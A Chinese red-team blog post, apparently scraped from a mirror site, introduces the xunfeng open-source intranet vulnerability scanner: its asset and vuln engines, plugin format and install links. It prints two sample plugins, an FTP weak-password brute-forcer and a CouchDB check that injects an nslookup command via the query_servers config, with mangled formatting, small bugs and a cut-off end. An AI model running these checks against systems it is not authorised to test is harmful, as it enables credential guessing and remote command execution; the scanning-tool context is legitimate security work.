当前位置：首页 > news >正文

红队专题-开源漏扫-巡风xunfeng源码剖析与应用

news 2026/2/9 13:13:11

在这里插入图片描述

开源漏扫-巡风xunfeng

介绍
主体两部分：网络资产识别引擎，漏洞检测引擎。
- 代码赏析
- 插件编写
- - JSON标示符
  - Python脚本
  - - 此外系统内嵌了辅助验证功能
- 文件结构
- 功能模块
- - 添加IP
- 三. 进行扫描
在这里插入图片描述 ![在这里插入图片描述](https://img-blog.csdnimg.cn/direct/de587a6f6f6947118cd695fa3fa30851.png)
- 巡风源码剖析——源码解析
- Win10部署和调试巡风
- - 安装 python 解释器:
  - python 依赖库
- 使用pip安装 python 依赖库, 这里使用了豆瓣的 pypi 源。
- - 安装数据库
- https://github.com/ysrc/xunfeng/blob/master/docs/install/Windows.md 安装指南 win
- Ubuntu部署和调试巡风
docker安装
- 2021.2.22

巡风
https://github.com/ysrc/xunfeng
http://x:8000/login
https://blog.csdn.net/hl1293348082/article/details/123865548
https://blog.csdn.net/weixin_42417767/article/details/102859978

介绍

巡风是一款适用于企业内网的漏洞快速应急，巡航扫描系统。
支持多平台安装，包括windows、linux、OSX、docker
在这里插入图片描述
1.查看内部网络资产分布
2.指定漏洞插件对搜索结果进行快速漏洞检测
3.并输出结果报表

下载传送门

主体两部分：网络资产识别引擎，漏洞检测引擎。

·
在这里插入图片描述

①网络资产识别：
通过用户配置的IP范围定期自动的进行端口探测（支持调用MASSCAN），
并进行指纹识别，识别内容包括：服务类型、组件容器、脚本语言、CMS。

②漏洞检测引擎
根据用户指定的任务规则进行定期或者一次性的漏洞检测，
其支持2种插件类型、标示符与脚本，均可通过web控制台进行添加。

资产扫描和漏洞扫描都是基于数据库中特定字段的改变，会有心跳线程monitor（），不断的去检查数据库中字段。用户在页面上的操作，都是先改变数据库内容而已。
所以比如开启某个漏扫任务，可能没法马上开始。

在这里插入图片描述

代码赏析

任务模块化，结构化的思维

项目比较完整

插件编写

漏洞插件支持2种类型，json标示与python脚本，
可以通过官方推送渠道安装或者自行添加。
在这里插入图片描述

JSON标示符

在这里插入图片描述

Python脚本

插件标准非常简洁，
只需通过 get_plugin_info 方法定义插件信息，check函数检测漏洞即可。
在这里插入图片描述

此外系统内嵌了辅助验证功能

在这里插入图片描述

使用例子:


import ftplibdef get_plugin_info():  # 插件描述信息plugin_info = {"name": "FTP弱口令","info": "导致敏感信息泄露，严重情况可导致服务器被入侵控制。","level": "高危","type": "弱口令","author": "wolf@YSRC","url": "","keyword": "server:ftp",  # 推荐搜索关键字}return plugin_infodef check(ip, port, timeout): # 漏洞检测代码user_list = ['ftp', 'www', 'admin', 'root', 'db', 'wwwroot', 'data', 'web']for user in user_list:for pass_ in PASSWORD_DIC:  # 密码字典无需定义，程序会自动为其赋值。pass_ = str(pass_.replace('{user}', user))try:ftp = ftplib.FTP()ftp.timeout = timeoutftp.connect(ip, port)ftp.login(user, pass_)if pass_ == '': pass_ = 'null'if user == 'ftp' and pass_ == 'ftp': return u"可匿名登录"return u"存在弱口令，账号：%s，密码：%s" % (user, pass_)  # 成功返回结果，内容显示在扫描结果页面。except:passimport urllib2import randomimport socketdef get_plugin_info():  # 插件描述信息plugin_info = {"name": "CouchDB未授权访问","info": "导致敏感信息泄露，攻击者可通过控制面板执行系统命令，导致服务器被入侵。","level": "高危","type": "未授权访问","author": "wolf@YSRC","url": "","keyword": "server:couchdb",  # 推荐搜索关键字}def get_ver_ip(ip):csock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)csock.connect((ip, 80))(addr, port) = csock.getsockname()csock.close()return addrdef random_str(len):str1=""for i in range(len):str1+=(random.choice("ABCDEFGH1234567890"))return str(str1)def check(ip,port,timeout):rand_str = random_str(8)cmd = random_str(4)server_ip = get_ver_ip()req_list = [["/_config/query_servers/%s"%(cmd),'"nslookup %s %s>log"'%(rand_str,server_ip)],["/vultest123",''],["/vultest123/test",'{"_id":"safetest"}']]for req_info in req_list:try:request = urllib2.Request(url+req_info[0],req_info[1],timeout=timeout)request.get_method = lambda: 'PUT'urllib2.urlopen(request)except:passtry:req_exec = urllib2.Request(url + "/vultest123/_temp_view?limit=11",'{"language":"%s","map":""}'%(cmd))req_exec

红队专题-开源漏扫-巡风xunfeng源码剖析与应用

开源漏扫-巡风xunfeng

介绍

主体两部分：网络资产识别引擎，漏洞检测引擎。

代码赏析

插件编写

JSON标示符

Python脚本

此外系统内嵌了辅助验证功能

相关文章：

红队专题-开源漏扫-巡风xunfeng源码剖析与应用

统计接口调用耗时情况设计思路（大厂面试题）

Elasticsearch：什么是 DevOps？

C语言基础练习——Day03

膜厚测量仪在半导体应用中及其重要

【前端】-初始前端以及html的学习

uni-app navigateTo路由传参传递对象

99 centos 7 服务器上面增加了 2181 的防火墙配置, 但是客户端连接不上

云计算科学与工程实践指南--章节引言收集

探索Web中的颜色选择：不同取色方法的实现

突破编程_C++_设计模式（策略模式）

【uniapp】uniapp小程序中实现拍照同时打开闪光灯的功能，拍照闪光灯实现

在python model train里如何驯服野生log?

产品推荐 - Xilinx FPGA下载器 XQ-HS/STM2

STM32 SDRAM知识点

手写分布式配置中心（六）整合springboot（自动刷新）

记录一次排查负载均衡不能创建的排查过程

数据推送解决方案调研

二、NLP中的序列标注（分词、主体识别）

seq2seq翻译实战-Pytorch复现

深度学习在微纳光子学中的应用

＜6＞-MySQL表的增删查改

Unity3D中Gfx.WaitForPresent优化方案

JVM暂停（Stop-The-World，STW）的原因分类及对应排查方案

C++ Visual Studio 2017厂商给的源码没有.sln文件易兆微芯片下载工具加开机动画下载。

初学 pytest 记录

sipsak：SIP瑞士军刀！全参数详细教程！Kali Linux教程！

vulnyx Blogger writeup

[ACTF2020 新生赛]Include 1(php://filter伪协议)

深入理解Optional：处理空指针异常